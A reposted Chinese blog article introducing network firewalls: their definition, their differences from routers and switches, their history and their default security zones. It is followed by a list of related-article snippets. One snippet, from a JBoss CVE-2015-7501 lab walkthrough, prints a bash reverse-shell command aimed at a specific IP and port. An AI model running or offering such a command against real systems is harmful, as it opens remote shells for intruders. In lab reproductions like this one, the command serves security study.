防火墙详解(一) 网络防火墙简介

news2024/12/26 0:08:25

原文链接:https://blog.csdn.net/qq_46254436/article/details/105519624

文章目录
定义
与路由器和交换机的区别
发展历史
防火墙安全区域
定义
防火墙主要用于保护一个网络区域免受来自另一个网络区域的网络攻击和网络入侵行为

在这里插入图片描述

“防火墙”一词起源于建筑领域,用来隔离火灾,阻止火势从一个区域蔓延到另一个区域。引入到通信领域,防火墙这一具体设备通常用于两个网络之间有针对性的、逻辑意义上的隔离。当然,这种隔离是高明的,隔离的是“火”的蔓延,而又保证“人”的穿墙而过。这里的“火”是指网络中的各种攻击,而“人”是指正常的通信报文。

用通信语言来定义,防火墙主要用于保护一个网络区域免受来自另一个网络区域的网络攻击和网络入侵行为。因其隔离、防守的属性,灵活应用于网络边界、子网隔离等位置,具体如企业网络出口、大型网络内部子网隔离、数据中心边界等等。

防火墙的一些特征

一般防火墙放在内网和外网之间
隐藏内网结构
自己具有安全保障
防火墙是拒ping的,为流量黑洞。通俗的来讲就是ping防火墙是ping不通的


与路由器和交换机的区别
防火墙与路由器、交换机是有区别的。
路由器用来连接不同的网络,通过路由协议保证互联互通,确保将报文转发到目的地;
交换机则通常用来组建局域网,作为局域网通信的重要枢纽,通过二层/三层交换快速转发报文;
而防火墙主要部署在网络边界,对进出网络的访问行为进行控制,安全防护是其核心特性。路由器与交换机的本质是转发,防火墙的本质是控制。
现阶段中低端路由器与防火墙有合一趋势,主要也是因为二者互相功能兼具,变成all in one的目标,华为也发布了一系列中低端设备。

在这里插入图片描述
发展历史

 在这里插入图片描述

最早的防火墙可以追溯到上世纪80年代末期,距今已有二十多年的历史。在这二十多年间,防火墙的发展过程大致可以划分为下面三个时期:

1989年至1994年:

1989年产生了包过滤防火墙,实现简单的访问控制,称之为第一代防火墙。
通过检测数据报文的头部来防控:通过五元组来过滤数据包
包过滤有较多的缺点
无法关联数据包之间的关系(如:TCP三次握手,有三次报文的交互,包过滤防火墙会每个包都检测)导致防火墙处理速度慢。
无法适应多通道协议(如:FTP)
通过不检查应用层包含的数据,不安全。
由于包过滤防火墙处理流量的时候速度慢,对应用层的数据不检测,所以出现了代理防火墙,在应用层代理内部网络和外部网络之间的通信,属于第二代防火墙。代理防火墙安全性较高,但处理速度慢,而且对每一种应用开发一个对应的代理服务是很难做到的,因此只能对少量的应用提供代理支持。

优点
安全性很高(针对每种不同的应用开发;而且过滤时不仅仅只看五元组,还对数据进行详细的刨析)
缺点
开发难度大(需要针对每种不同的应用开发)(个别如:专门保护Web服务器安全的WAF(Web Application Firewall,Web应用防火墙))
效率低,处理速度慢
由于以上两种防火墙技术都有一定的缺点,所以目前使用上述两种技术的防火墙并不多。

1994年业界发布了第一台基于状态检测技术的防火墙,通过动态分析报文的状态来决定对报文采取的动作,不需要为每个应用程序都进行代理,处理速度快而且安全性高。状态检测防火墙被称为第三代防火墙。状态检测防火墙也是目前最常用的防火墙。

优点
处理速度快:处理第一个数据包,后续相关联的包通过会话表项进行快速转发。这样既保证了安全又保证了速度。
简单工作机制:假设发送者发送6个包,防火墙会处理第一个包,并根据第一个包建立对应的会话表项,后续数据包根据匹配会话表项进行转发。(具体后面有文章做介绍)

1995年至2004年:
在这一时期,状态检测防火墙已经成为趋势。除了访问控制功能之外,防火墙上也开始增加一些其他功能,如VPN。
2004年业界提出了UTM(United Threat Management,统一威胁管理)的概念,将传统防火墙、入侵检测、防病毒、URL过滤、应用程序控制、邮件过滤等功能融合到一台防火墙上,实现全面的安全防护。
2004年后,UTM市场得到了快速的发展,UTM产品如雨后春笋般涌现,但面临新的问题。首先是对应用层信息的检测程度受到限制,此时就需要更高级的检测手段,这使得DPI(Deep Packet Inspection,深度报文检测)技术得到广泛应用。其次是性能问题,多个功能同时运行,UTM设备的处理性能将会严重下降。
2008年业界发布了下一代防火墙,解决了多个功能同时运行时性能下降的问题。同时,还可以基于用户、应用和内容来进行管控。
2009年业界对下一代防火墙进行了定义,明确下一代防火墙应具备的功能特性。随后各个安全厂商也推出了各自的下一代防火墙产品,防火墙进入了一个新的时代。

防火墙安全区域
防火墙怎么去防御呢?
很简单,防火墙以自身为中心,将整个网络划分成不同的区域(Zone),通过的流量来自不同的区域,来决定是否通过。

缺省区域的划分:

缺省区域解释安全等级
Local本地区域:防火墙自身100
Trust信任区域:需要保护的区域85
DMZ公共区域/中立区域/非军事化区域50
Untrust不信任区域:需要地域的区域5

以上为防火墙的缺省区域,若需要其他区域我们可自行创建,但是创建的区域的安全等级不能相同。
我们一般将内网放在Trust区域,外网放在Untrust区域,将服务器等需要共同访问的放在DMZ区域。

安全等级:标记安全区域的可信程度,数值越高,信任程度越高。

在这里插入图片描述
Zone的作用: 

安全策略都基于安全区域实施
在同一安全区域内部发生的数据流动是不存在安全风险的,不需要实施任何安全策略
只有当不同安全区域之间发生数据流动时,才会触发设备的安全检查,并实施相应的安全策略
在防火墙中,同一个接口所连网络的所有网络设备一定位于同一安全区域中,而一个安全区域可以包含多个接口所连的网络
注意:在防火墙中是以接口为单位来进行分类,即同一个接口所连网络的所有网络设备一定位于同一安全区域中,而一个安全区域可以包含多个接口所连的网络。这里的接口既可以是物理接口,也可以是逻辑接口。所以可以通过子接口或者VLAN IF等逻辑接口实现将同一物理接口所连的不同网段的用户划入不同安全区域的功能。

原文链接:https://blog.csdn.net/qq_46254436/article/details/105519624

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2158428.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ARM单片机的详细启动流程(重要)

ARM单片机的详细启动流程 一、ARM架构 ARM Cortex_M3内核中提供了多个复位信号,厂商设计MCU时一般只使用以下三个复位信号,其他复位信号在MCU内部实现(如看门狗复位信号、软件复位:软件服务只能复位内核,内核以外不受…

(附源码)基于django的电力工程作业现场物资管理系统的设计与实现-计算机毕设 22067

基于django的电力工程作业现场物资管理系统的设计与实现 摘 要 随着电力工程的快速发展,作业现场物资管理成为保障工程进度和质量的关键环节。本文旨在设计并实现一个基于Django框架的电力工程作业现场物资管理系统,以提高物资管理的效率和准确性。该系统…

移情别恋c++ ദ്ദി˶ー̀֊ー́ ) ——14.AVL树

1.AVL 树 1.1AVL 树的概念 二叉搜索树虽可以缩短查找的效率,但如果数据有序或接近有序二叉搜索树将退化为单支树,查 找元素相当于在顺序表中搜索元素,效率低下。因此,两位俄罗斯的数学家G.M.Adelson-Velskii 和E.M.Landis在1962…

Redis事务总结

1.事务介绍 Redis 事务是一个用于将多个命令打包在一起执行的功能,它可以确保这些命令按照顺序执行,并且具有原子性。这意味着事务中的命令要么全部执行,要么全部不执行,这有助于保持数据的一致性。 Redis 事务本质:…

小程序开发设计-协同工作和发布:协同工作⑧

上一篇文章导航: 小程序开发设计-小程序的宿主环境:组件⑦-CSDN博客https://blog.csdn.net/qq_60872637/article/details/142455350?spm1001.2014.3001.5501 注:不同版本选项有所不同,并无大碍。 目录 上一篇文章导航&#x…

Matlab/simulink低版本打开高版本

很简单,取消”预设“下一个选项的勾即可, 我是21a,打开21b的simulink亲测有效,以下是过程记录

校园社区服务系统小程序的设计

管理员账户功能包括:系统首页,个人中心,用户管理,发布类型管理,互帮互助管理,物品分类管理,闲置交易管理,购买物品管理,反馈信息系统管理 微信端账号功能包括&#xff1…

lammps计算区域压力的两种方法

大家好,我是小马老师。 本文介绍lammps计算区域压力的两种方法。 在lammps模拟中,计算某一个固定区域内气体或者液态的压力,可以先计算该区域内所有单个原子的应力,然后把区域内原子的应力值求和再除以体积。 只有处于该区域内的原子参与压力的计算,当原子移动出该区域后,…

如何合并pdf文件,四款软件,三步搞定!

在数字化办公的浪潮中,PDF文档因其跨平台兼容性和安全性,成为了我们日常工作中不可或缺的一部分。然而,面对多个PDF文件需要整合成一个文件时,不少小伙伴可能会感到头疼。别担心,今天我们就来揭秘四款高效PDF合并软件&…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

Linux C# Day4

作业: 1.统计家目录下.c文件的个数 #!/bin/bash num0 for filename in ls ~/*.c do((num)) done echo $num2.定义一个稀疏数组(下标不连续),写一个函数,求该稀疏数组的和,要求稀疏数组中的数值通过参数传递到函数中arr([2]9 [4…

基于单片机的自行车智能辅助系统设计

文章目录 前言资料获取设计介绍功能介绍设计程序具体实现截图目 录设计获取 前言 💗博主介绍:✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师,一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等单片机设计 …

多数元素-简单

169. 多数元素 - 力扣(LeetCode) 【LeetCode 每日一题】169. 多数元素 | 手写图解版思路 代码讲解_哔哩哔哩_bilibili c为计数器,代表当前候选人的票数 v为当前候选人 x为遍历的各候选人得票 分三种情况: 第一种,c…

OpenBayes 一周速览|IC-Light 图片打光神器一键启动!Tecnalia 电子设备废物高光谱数据集上线,提高电子废物回收准确性

公共资源速递 This Weekly Snapshots ! 5 个数据集: * BTAD 工业异常数据集 * WebVid 大型短视频数据集 * bAbi 问答和文本理解的数据集 * OpenMIR 音乐收听脑电图数据集 * Tecnalia 电子设备废物高光谱数据集 2 个教程: * ComfyUl …

12. Inseq 特征归因:可视化解释 LLM 的输出

Feature Attribution(特征归因):你可以将其当做对模型输出的解释,就像在图像分类中可视化模型关注的区域一样。 本文将介绍 Inseq,这是一个用于解释和可视化序列生成模型输出的工具。我们将通过翻译任务(关…

Flink 本地启动的多种方式

Flink 本地启动的多种方式 Application模式通过代码提交到Yarn上启动 //设置Yarn客户端 YarnClient yarnClient ; Configuration configuration new Configuration(); if (customConfiguration ! null) {configuration.addAll(customConfiguration); } configuration.set(Jo…

Linux——虚拟机网络配置

进行虚拟机网络配置是确保虚拟机能够正常访问网络、与宿主机及其他设备进行通信的关键步骤。虚拟机网络配置允许用户根据实际需求选择合适的网络模式,并调整网络参数以满足特定的网络环境要求。 虚拟机常见的三种网络模式包括桥接模式、NAT模式和主机模式&#xff…

Shiro rememberMe反序列化漏洞(Shiro-550) 靶场攻略

漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会⽣成经过 加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反 序列化,就导致了反序列化RCE漏洞。 那么&a…

制作网上3D展馆需要什么技术并投入多少费用?

制作网上3D展览馆项目,需要考虑以下技术和预算方面的信息: 技术需求: 1、三维建模技术:利用3D软件(3ds max、maya、blender、c4d等)制作展馆和展品的3D模型 2、Web3D技术:如WebGL&#xff0c…

飞腾平台perf工具PMU事件集成指南

【写在前面】 飞腾开发者平台是基于飞腾自身强大的技术基础和开放能力,聚合行业内优秀资源而打造的。该平台覆盖了操作系统、算法、数据库、安全、平台工具、虚拟化、存储、网络、固件等多个前沿技术领域,包含了应用使能套件、软件仓库、软件支持、软件适…